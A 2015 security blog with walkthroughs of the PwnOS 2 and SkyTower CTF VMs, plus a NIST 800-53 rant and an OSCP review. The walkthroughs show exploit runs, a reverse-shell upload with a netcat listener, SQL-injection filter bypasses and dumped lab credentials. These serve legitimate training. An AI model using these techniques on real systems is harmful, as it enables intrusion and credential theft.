Def Security Jam

Friday, July 24, 2015

John McAfee - How to Uninstall McAfee Antivirus

This may be a bit dated but I find it totally hilarious and had to share it to those who haven't seen it as of yet. John definitely embodies the strategy of getting in the game and cashing out. I wonder what ever happened with that murder investigation. Watching this video makes it clear why Intel had no problems shedding the "McAfee" brand for "Intel Security" .... Anyway, enjoy!

Til next time,
Court

Saturday, July 11, 2015

PWNOS Version 2 Walkthrough

Needing to keep the old knife sharp, i decided to try my luck at the PWNOS 2 vulnerable virtual machine. After setting up the VM in VirtualBox. I took the approach of configuring a NAT Network with the range of 10.10.10.0/24 which placed my machine on the same subnet as the static IP of 10.10.10.100 assigned to the image.

root@kali:~# nmap 10.10.10.100

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-04 22:44 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:6C:04:53 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
root@kali:~# nmap -A 10.10.10.100

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-04 22:45 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00052s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Welcome to this Site!
MAC Address: 08:00:27:6C:04:53 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
root@kali:~#

The default webpage on port 80 seemed to be an Intranet web site

I decided to run my usual set of web server enumeration tools against the box.

root@kali:~# nikto -h http://10.10.10.100
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.100
+ Target Hostname: 10.10.10.100
+ Target Port: 80
+ Start Time: 2015-07-04 22:47:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /register/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 1311031, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /login.php: Admin login page/section found.
+ 7331 requests: 0 error(s) and 22 item(s) reported on remote host
+ End Time: 2015-07-04 22:47:25 (GMT-4) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#

root@kali:~# dirb http://10.10.10.100 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Sat Jul 4 22:48:59 2015
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50171)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/colors (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5921)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8093)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5670)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4954)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5312)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upload_img (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
DOWNLOADED: 40916 - FOUND: 28
root@kali:~#

The DirBuster scan also revealed a login.php site which seemed to be prone to SQL Injection but was definitely filtering some of the more basic exploits.

I decided to take a closer look at the source of the /blog page. I found that the underlying app was Simple PHP Blog 0.4.0.

Lets see if we can find any vulnerabilities or exploits associated with Simple PHP Blog 0.4.0

The exploitdb had a couple exploits that fit the bill, one Metasploit module as well as the perl based exploit that I decided to go with

root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 2

________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Username and Password Hash Retrieval Exploit....

Retrieved Username and Password Hash: $1$zsdi5o/7$kJuEkwpL6uEqhrXFDn98y/

*** Exploit Completed....
Have a nice day! :)
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 3

________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....

Deleted File: ./config/password.txt
Use of uninitialized value $user in concatenation (.) or string at 1191.pl line 341.
./config/password.txt created!
Use of uninitialized value $pass in concatenation (.) or string at 1191.pl line 342.
Username is set to:
Password is set to:

*** Exploit Completed....
Have a nice day! :)
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 3 -U court -P password

________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....

Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: court
Password is set to: password

*** Exploit Completed....
Have a nice day! :)
root@kali:~/pwnos2# ls
1191.pl exploit2.php exploit.php
root@kali:~/pwnos2# cp /var/www/php-reverse-shell.php .
root@kali:~/pwnos2# nano php-reverse-shell.php
root@kali:~/pwnos2#

Awesome, the exploit allow me to create on the blog application, hopefully I can now upload a web or reverse shell to the system.

The first place I always check in on the Kali Linux disto under /usr/share/webshells/php. I used the old reliable php_reverse_shell.php. After modifying the code to match my IP address, I successfully uploaded the code to the blog site. I was afraid that it I'd run into filtering which would restrict the file type, but was lucky this time.

I uploaded the shell, started a netcat listener on my system for port 1234, as set within my php_reverse_shell.php file, browsed to the malicious page (10.10.10.100/blog/images/php_reverse_shell.php) and boom! I'm in

Having no job control in this shell I used the installed instance of python to get an improved shell. I looked around a bit in the /var/www directory for interesting give-aways in files.

root@kali:~/pwnos2# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.100: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.10.10.5] from (UNKNOWN) [10.10.10.100] 36792
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
01:57:41 up 3:34, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off

$ /bin/bash -i
bash: no job control in this shell
www-data@web:/var/www$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@web:/var/www$ ls
ls
activate.php includes info.php mysqli_connect.php
blog index.php login.php register.php
www-data@web:/var/www$ more

The file named mysqli_connect.php had some mysql db credentials in it.

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

We all know about the likelihood of password reuse, so I attempted to try what I found both inside and outside the database. Unfortunately it didn't workout for me. I spent several hours running local privilege escalation exploits, Linux privilege vulnerability scripts, etc, until I stumbled across a separate file also named mysqli_connect.php located at in the /var directory. This file had separate credentials which worked for the mysql instance. I decided to pillage the db a bit.

cat mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:/var$

www-data@web:/var$ mysql -u root
mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
www-data@web:/var$ mysql -u root -proot@ISIntS
mysql -u root -proot@ISIntS
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1113
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| ch16 |
| mysql |
+--------------------+
3 rows in set (0.00 sec)

mysql> use ch16;
use ch16;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users |
+----------------+
1 row in set (0.00 sec)

mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email | pass | user_level | active | registration_date |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| 1 | Dan | Privett | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af | 0 | NULL | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)

mysql>

The db contents could have proven helpful in my conquest, but I gave the credentials a go on the system and boom, good ol'e password reuse strikes again.

Woot, Woot!

I enjoyed this VM allot, thanks to the guys at http://www.pwnos.com/. I'll keep my eyes open for a Version 3.

Saturday, June 6, 2015

Post OPM Breach Rant

Like the majority of cyber security professionals in the world, I can't help but to reflect on the recent major beach of US government personnel files from the Office of Personnel Management.

While the government has made strides towards unifying the security postures across agencies, with efforts like the DHS Trusted Internet Connection initiative, as well as advanced technical solutions like the EINSTEIN 3 Intrusion Detection System; I feel that a more fundamental form a remediation is necessary.

Security can be compromised by ambiguities and shortcomings in the guiding standards. A recent GAO finding pertinent to reports of FISMA compliance associated with use of the previous version of SP 800-53 indicated disconnects between FISMA compliance reports and agencies' actual security posture (M.E Kabay 2009 – NIST 800-53 is essential in federal government IT systems). I'm here to say that his ambiguity still persists in SP800-53, Revision 4.

We (our government's Infosec leaders) need to rework information security strategy from the ground up, by creating a clear standard which allows our numerous agencies to elevate their security postures rather than creatively word-smithing their existing procedures around unclear security controls. Although not perfect, commercial standards such as the Payment Card Industry Standard (PCI-DSS version 3.1) have addressed this issue well. The end result of a PCI assessment generally leaves the subject knowing 3 things; We have this control in place, or We do not have this control in place, & finally we'll have to implement X to become compliant.

Of course there are always multiple technical shortcomings that factor into breaches of this magnitude, however ultimate remediation starts from the bottom of the stack. The integration of commercial products and personnel, in the form of government contractors, have long been a strategy embraced by the federal government. This approach has not been applied in the development of 800-53, or at least not done well. Not to totally discredit the standard, it was definitely a forerunner of the majority of regulatory compliance standards, and implemented correctly addresses the vast majority of all security risks. However, I do feel that in this case less may be more. Collectively the NIST standard is comprised of over 950 individual controls, turning something that actually isn't rocket science into an exercise which I'd rather just build a rocket instead of performing.

Removing some of the complexity and red tape which is not aligned to true risk, will allow agencies, and commercial organizations alike to concentrate on the basic shortcomings that cyber criminals target and successfully compromise again, and again....

Saturday, May 30, 2015

The Sky Tower Vulnerable VM Walkthrough

I recently took on the challenge to hack the Sky Tower Vulnerable VM. This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the "flag".

As usual this VM is hosted by the good folks at vulnhub.com with a ton of other challenges. Here's the approach that I took to gain root level access to the box:

Enumeration

root@kali:~# nmap -A 10.1.1.7

Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-28 20:55 EDT
Nmap scan report for 10.1.1.7
Host is up (0.00084s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.20
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 10.1.1.7

The quick glance shows a filtered SSH service, possible website on port 80, and a Squid http proxy. Needing more information, I fired up Nikto and Dirbuster.

root@kali:~# nikto -h 10.1.1.7
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:10.1.1.7
+ Target Hostname: 10.1.1.7
+ Target Port: 80
+ Start Time: 2015-05-28 21:23:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 07:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7343 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2015-05-28 21:24:01 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# dirb http://10.1.1.7

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Thu May 28 21:25:56 2015
URL_BASE: http://10.1.1.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://10.1.1.7/ ----
+ http://10.1.1.7/background (CODE:200|SIZE:2572609)
+ http://10.1.1.7/cgi-bin/ (CODE:403|SIZE:284)
+ http://10.1.1.7/index (CODE:200|SIZE:1136)
+ http://10.1.1.7/index.html (CODE:200|SIZE:1136)
+ http://10.1.1.7/server-status (CODE:403|SIZE:289)
-----------------
DOWNLOADED: 4592 - FOUND: 5

Ok, looking at these results, I see an outdated version of apache running, a login.php page which warrants a closer look, sever pages identified by Dirbuster which are require investigation.

First let's take a look at the login.php page. We find a typical form based page which may be susceptible to Sql Injection:

Using basic single quote techniques and such, I'm able to get the system to generate an overly verbose message revealing the underlying database type:

Curious, and wanting to justify advancing down the Sqli path, I ran Uniscan to verify the injection point:

I attempted multiple Sql Injection login bypass strings to no avail. Additionally, I fired up the Tamper Data proxy browser plugin to gain a bit more control over the session.

Mildly frustrated, I began a search for common Sql Injection blacklist bypass techniques. I found lots of information, maybe too much; but eventually I stumbled upon a awesome whitepaper on the exploit-db site https://www.exploit-db.com/papers/17934/.

From the whitepaper I extracted this guidance:

Here is a simple bypass using &&, || instead of and, or respectively. Filtered injection: 1 or 1 = 1 1 and 1 = 1 Bypassed injection: 1 || 1 = 1 1 && 1 = 1

I used this new found information to attempt a bypass on the login page. A bit if additional trial and error, mainly around the proper terminating comment character (“--” #) got me past the login page:

Ignoring the filtered status of port 22, I attempted an unsuccessful connection:

Taking the Squid http proxy approach, I decided to attempt to connect using Proxychains. I'd recently performed a similar hack in the Offensive Security OSCP lab, so it wasn't totally foregin to me. I modified /etc/proxychains.conf to connect to the victim machine on port 3189.

Proxychains was able to successfully connect on the machine's ssh port using the obtained credentials:

root@kali:~# proxychains ssh john@10.1.1.7
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
The authenticity of host '10.1.1.7 (10.1.1.7)' can't be established.
ECDSA key fingerprint is f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.7' (ECDSA) to the list of known hosts.
john@10.1.1.7's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 07:41:08 2014

Funds have been withdrawn
Connection to 10.1.1.7 closed.
root@kali:~#

Upon connection the session closes immediately, however I was able to execute commands over ssh. With this ability I could further system enumeration, attempt to execute a revershell, try to escape the shell that keeps shutdown upon connection, etc....

Issuing an “/bin/sh -i” command, I was able to get a more peristent shell, but it not have “job control”. Afraid that this would restrict something I wanted to do, I opted to modify the .bashrc file in John's home directory:

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:
total 24
drwx------ 2 john john 4096 Jun 20 2014 .
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..
-rw------- 1 john john 7 Jun 20 2014 .bash_history
-rw-r--r-- 1 john john 220 Jun 20 2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20 2014 .bashrc
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile

I simple renamed the .bashrc file to break its influence on my session.

root@kali:~# proxychains ssh john@10.1.1.7 "mv .bashrc bashrc.bak"
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:

Finally got a solid shell:

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 28 23:52:47 2015 from 10.1.1.7
john@SkyTower:~$

Poking around on the system I took a look in the login.php file and found hardcoded mysql db credentials:

I also found the pesky culprit behind our Sql Injection auth bypass issues:

$sqlinjection = array("SELECT", "TRUE", "FALSE", "--","OR", "=", ",", "AND", "NOT");
$email = str_ireplace($sqlinjection, "", $_POST['email']);
$password = str_ireplace($sqlinjection, "", $_POST['password']);

$sql= "SELECT * FROM login where email='".$email."' and password='".$password."';";
$result = $db->query($sql);

Using the db credentials, I was able to login to the db and extract additionaldb credentials:

john@SkyTower:/var/www$ mysql --user=root --password=root SkyTech
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2288
Server version: 5.5.35-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

-----------------------------------------------------------------------------------------------------------------------------------------------

mysql> use SkyTech;
Database changed

mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable |
+----+---------------------+--------------+
3 rows in set (0.00 sec)

mysql>

Giving the db username and passwords a try for system login worked out for me. I was able to login as sara who had limited sudo access to list and cat a couple of root directories. I in turn used this access to include the listing of the root home directory and using cat to open the flag.txt file.

sara@SkyTower:~$ sudo ls /accounts/../root/
flag.txt
sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower

sara@SkyTower:~$ su root
Password:
root@SkyTower:~#

We'll that's all for this one. I really enjoyed this challenge. I'll keep my eyes open for more from the folks at TeleSpace Systems.

Court Graham, signing off....

Wednesday, May 27, 2015

Offensive Security PWK Course and Exam Testimonial

I recently completed the Penetration Testing with Kali Linux course and successfully passed the Offensive Security Certified Professional Exam. However, the path to success was not without its hurdles. I'm writing this course/exam review to paint a picture of what to expect, as well as shine some light on the mental preparation necessary.

If you are reading this review, I'm just about certain that you know the all about the registration process, course syllabus, video and printed material format, hands on lab environment and examination process. If not please refer to the Offensive Security training and certification websites.

As many of prospective students of the course, I have a full basket of life responsibilities including but not limited to a full time job as an information security professional, a husband, father of 3 boys, a 1 hour commute to and from the office, and an infinite honey do list. With those responsibilities alone you may be wonder when I would have time to time to take on this sort of certification challenge. The short answer is you'll need to cut into you normal sleep hours.

I've broken down my training, lab and exam rants into a list of numbered per-conceptions, mis-conceptions, and suggestions:

Course & Exercises

The PWK Course Covers all topics necessary for the exam – I believe this statement to be true, but however make sure to study the theories and research the topics on your own. Use both the exercises and lab time to make the practical application of each topic second nature.
You have to complete and submit all of the completed exercises in order to register for the exam – This is not true. The Offensive Security Staff will definitely not impose such restrictions on the student. You'll soon find out how much the responsibility is on you to make sure you are ready. Don't take this as an opportunity to not complete the exercises, they're there for a reason.
You can study by reviewing videos and the documentation and do not require lab time – This is partially true. I'll explain; Depending the time that you can invest (Daily/Nightly) the initial lab time may only be lightly utilized. Without giving too much away, the early portion of the training is centered around enumeration, both WAN, LAN, and system; this is for good reason. With that said you'll be able to sharpen these skills in the lab, but this will not require the amount of time that you'll have to invest later in the course. If you find that you initial lab time is running short don't panic, continue to take the necessary time to study the contents in from the videos and printed material.

Don't hesitate to purchase more lab time if necessary!

The Lab Environment

The PWK Lab Environment consist of approximately 50 machines which span 3 different networks. This is a true playground for the security enthusiast. The degree of difficulty varies from one machine to the next.

You do not have to compromise all 50 machines – As mentioned in my previous point, it is your responsibility to best prepare your self for the OSCP exam. These machines are priceless in the pursuit of preparation, but its easy to loose focus and forget about the primary goal, the OSCP certification. You can always purchase lab time with the intent on owning all of the machines if that's your desire.
Regulate the amount of lab assistance you receive – If utilized, the lab and the associated freenode #offsec irc channel, serve as a great resource to communicate with your peers and the Offensive Security administrators. The Offsec admins are wise and will not give you too much information. The prize is truly in the pursuit, they're aware of this and will not hesitate to tell you to “Try Harder”.

Resist the temptation to turn to your peers for too much guidance; it will hurt you in the long run!
Take detailed notes during your lab conquest – This detailed note taking process will come in handy, as during the exam you will doubtingly wonder “How did I perform that one exploit, what was the syntax of that one command?” Your notes will save you time and serve as a great study resource even when you are not online. Keepnote which is available on your Kali Linux image is in my opinion the best tool for note keeping.

The Exam

I have taken countless IT and Security Certifications throughout my career, I have never failed in any attempt; until now......

I don't say this to scare or discourage anyone. First off, there is no such thing as failure; just continued opportunities for learning. Corny but true..

Actually, the third time was a Charm. I know how did that happen, let me tell you how so you can avoid the same mistakes, believe me its possible!

As you all know, you have approximately 24 hours to complete the required exam objectives which are communicated to you the day of the exam via email. You'll have a certain number of machines with associated scored objectives. Achieving these objectives while documenting your process and proof will give you a passing score. Once achieved you must submit the penetration test report to Offsec for evaluation (Pass/Fail).

Ok, now here some do's and dont's:

Do not allow your eyes to deceive you – You have just completed countless hours of theory and practical application of the required techniques necessary to pass the exam, better yet own the box at hand! “Avoid losing focus of the trees for the forest...” Don't worry about passing the exam until you're done with the last box. The thought and desire to pass can be distracting.

If you see a certain vulnerability, trust in your training, if its looks like chicken, tastes like chicken, its probably chicken!

This was culprit during my first attempt, don't over think during the challenge you know how to do this stuff. Don't let the subtle differences between the lab and exam throw you for a loop, use what you've been trained.

